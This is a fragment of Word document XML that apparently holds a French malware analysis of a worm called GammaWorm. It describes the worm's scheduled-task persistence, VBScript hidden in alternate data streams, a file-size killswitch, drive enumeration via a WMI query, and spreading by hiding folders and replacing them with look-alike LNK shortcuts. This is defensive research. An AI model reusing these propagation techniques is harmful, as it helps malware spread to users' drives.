            <wp:wrapNone/>
            <wp:docPr id="16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répertoire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\CertificateServicesClient\SystemTask\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Cette tâche exécute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2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8168228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5778270" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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27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commande suivante toutes les 7 minutes et lance le code VBScript stocké dans l’ADS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347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8383493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5640677" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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4067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\Users[USER]:LNK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, qui sert de module pour propager et infecter de nouveaux appareils.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4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8684918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Lors de son exécution, ce module vérifie d’abord l’existence du fichier ADS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8855340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:save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. Si ce fichier ADS existe et que sa taille est inférieure à 100 octets,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6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9037978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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processus s’arrête. Ce mécanisme est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killswitch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initialisé avec des chaînes de caractères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9211333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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codées en dur. Cependant, si la taille du fichier dépasse 100 octets, le module lit le contenu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8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9381755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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de </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:GTR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(qui est une copie complète de GammaWorm), le conserve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96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064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166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268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371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826240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5476884</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="2094229"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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2094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2094229">
                          <a:moveTo>
                            <a:pt x="0" y="1930399"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="2094229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2094229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1930399"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="899160"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="751840"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="162560"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="162560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="162560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62560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1930399"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="2094229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2094229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1930399"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1930399"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1783080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1635760"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1488440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1341120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1193799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1046480"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="899160"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="899160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="751840"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="162560"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="162560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="751840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="162560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62560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162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2560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5477519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="2093595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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2093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2093595">
                          <a:moveTo>
                            <a:pt x="3174" y="2093595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1930400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="2090420"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="2090420"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="2090420"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="2090420"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1930400"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="2093595"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1930400"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1783080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1930400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1635760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1783080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1488440"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1635760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1341120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1488440"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1193800"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1193800"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1341120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1193800"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1046480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1193800"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="899160"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1046480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="751840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="899160"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="162560"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="162560"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="751840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="162560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162560"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="2093595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1930400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1930400"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="2093595"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1930400"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1783080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1930400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1783080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1635760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1783080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1635760"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1488440"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1635760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1488440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1341120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1488440"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1341120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1193800"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1193800"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1341120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1193800"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1046480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1193800"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1046480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="899160"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1046480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="899160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="751840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="899160"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="751840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="162560"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="162560"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="751840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="162560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162560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4608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1623069</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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07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1623069</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2797178" cy="414019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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7178" cy="4140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97175" h="414019">
                          <a:moveTo>
                            <a:pt x="635" y="414019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1720215" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1720215" y="414019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1720850" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2797175" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="279717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4848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5557520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2053599</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1018539" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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853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853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1017904" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017904" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101853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8944" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2258060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2268229</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="937260" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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726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726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936625" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="936625" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93726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3040" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5524500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2268229</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1018539" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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853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8539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1017904" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017904" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101853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7136" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1118235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4442469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="772163" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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216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216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772160" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77216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1232" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5433695</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8369309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="934723" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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472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4719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934719" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93471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225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328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4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1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mémoire et la propagation peut alors commencer. À l’inverse, si le lien symbolique n’existe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5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047373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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47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pas, le module lit à la place le fichier </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%\boot.ini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6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1416073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Pour identifier les cibles de propagation, le m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odule répertorie le matériel et les périphériques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7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1608043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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réseau disponibles en exécutant la requête </w:t>
                        </w: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WMI select * from win32_logicaldisk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840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1823308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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where mediatype=null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. Cette requête inclut les lecteurs réseau (par exemple,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9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2038573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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montages SMB) ou les clés USB bon marché, et exclut le lecteur système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MediaType 12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0448" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2277745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2253838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4425833" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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58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MediaType 5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 et les supports amovibles standard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MediaType 11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1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2255543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1393745" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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374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lecteurs optiques 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2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2555263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Une fois le lecteur cible identifié, le module lance sa propagation. Il commence par lire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3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2725685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874162" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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16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charge utile en mémoire (préalablement copiée depuis le fichier ADS </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:GTR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4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2905390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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ou </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%\boot.ini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Cette charge utile est ensuite écrite dans un nouveau fichier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5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3085095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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nommé </w:t>
                        </w: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(le même nom que le GammaWorm actuel) directement à la racine du lecteur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6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3267733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361617" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6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ciblé.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7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3542688</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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 module parcourt tous les dossiers à partir de la racine. Il modifie leurs attributs pour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3716043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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définir sur "Caché" et "Système", les supprimant ainsi de l’affichage standard de l’utilisateur.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9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3889398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Pour remplacer ces répertoires disparus, le module crée des fichiers LNK malveillants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0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4062753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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portent exactement le même nom que les répertoires et utilisent l’icône standard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1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4236108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dos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siers. Ces ra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ccourcis de dossiers spécifiques utilisent une commande à double exécution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2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4428078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3446917" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4691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via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  <w:u w:val="single" w:color="000000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Une fois ces fichiers LNK ouverts, ils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376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4729503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4064416" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
